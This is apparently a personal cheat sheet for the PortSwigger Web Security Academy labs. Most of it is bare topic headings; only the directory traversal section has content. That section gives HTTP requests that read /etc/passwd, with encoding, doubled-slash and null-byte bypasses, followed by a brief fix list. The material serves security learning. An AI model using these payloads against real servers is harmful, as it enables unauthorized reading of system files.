/WebAcademyPortSwigger

PortSwigger Web Academy Cheatsheet

PortSwigger Web Academy

SQL Injection

Authentication

Directory Traversal

https://portswigger.net/web-security/file-path-traversal

Summary

Directory traversal (also known as file path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application.

https://gchq.github.io/CyberChef/

# Most basic case
GET /image?filename=../../../../../../etc/passwd HTTP/2
GET /image?filename=/etc/passwd HTTP/2

# Simple bypasses
GET /image?filename=//....//....//....//etc//passwd HTTP/2
# Double URL encoding
GET /image?filename=%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252Fpasswd HTTP/2
# Null byte to bypass extension check
GET /image?filename=../../../../../../etc/passwd%00.jpg HTTP/2

Fix

  • Validate user input
  • Only allow execution from canonical root directory

Command Injection

Business Logic Vulnerabilities

Information Disclosure

Access Control

File Upload Vulnerabilities

Server-Side Request Forgery SSRF

XXE Injection

Cross Site Scripting XXS

Cross Site Request Forgery CSRF

Cross Origin Resource Sharing CORS

Clickjacking

DOM Based Vulnerabilities

WebSockets

Insecure Deserialization

Server Side Template Injection SSTI

Web Cache Poisoning

HTTP Host Header Attacks

HTTP Request Smuggling

OAuth Authentication

JWT Attack

Prototype Pollution